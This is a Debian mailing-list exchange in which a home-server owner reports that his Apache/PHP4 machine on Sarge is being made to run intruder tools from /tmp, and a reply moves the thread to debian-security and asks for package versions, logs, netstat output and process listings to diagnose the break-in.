Hello Petter The actual list for security issues is debian-security. The address of this list its on the CC. We can now leave debian-user and switch our discussion into debian-security.
This is quite hole! Can't believe there's such a big spot in Apache / Sarge and we didn't heard of it. Can you please share more details with us? Give us your current package versions of apache (using dpkg -s for example). If you suspect the installation could be compromised run a test on the checksums. Your access logs could contain precious information. Have a look at them and post to the list any significant parts (removing any ip/host address you don't want to get published). We still don't know for what do you use your apache. Most of the problems come from poor PHP scripts. What scripts/services are you running in this server? Can you post a sample of your netstat, your list of process for user www-data, and a sample of the files you find in your /tmp ? Regards, Josep SERRANO > Hi > > I'm not completely new to Debian or Linux, but I wouldn't classify > myself as a battlescarred sysadmin just yet :) > > Anyways. My problem is security-related, and I hope that I'm posting to > the correct list as well as hoping that someone can help me out here. > > Recently I've noticed that my Apache-installation gets violated and that > an intruder somehow manages to put stuff in /tmp and /var/tmp. Then it > makes Apache execute these. Unfortunately these are some rather nasty > things, mostly portscanners and bruteforce-attacks. They are all easily > detected with netstat, and at least once a day I have to go in and kill > the processes spawned by www-data (the user that runs Apache) as well as > delete the offending files. > > Now, like I said - I'm not a pro, I'm trying to learn by doing. > Unfortunately how this happens is way over my experience, and now I > could really use some help in fixing this leak. I've narrowed it down to > Apache only, but I have no clue as to how to seal the leak. I'm running > a small server in my home using (mostly) Debian Sarge. This is a real > Frankenstein-machine as it was originally a Woody-box, but it's been > upgraded with bits from all over. It's been running pretty much > constantly for three years. Of course I apply security fixes when they > arrive, but I don't know if the source of these intrusions is Apache or > just that I have managed to fubar some setting somewhere, allowing an > attacker to make Apache execute code. > > Essentially the machine is Debian Sarge, with MySQL and PHP4. There are > other services running on it, but I've noticed that the > intrusions/code-executions only happen through Apache. MySQL only > listens on localhost and accepts no connections from the outside. Hence, > I hope that this is limited to Apache. Apache is 1.3.x, MySQL 4.0.24 and > PHP 4.3 > > I deeply appreciate any help that can make me seal this leak! Thank you > all in advance! > > /petter senften > -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
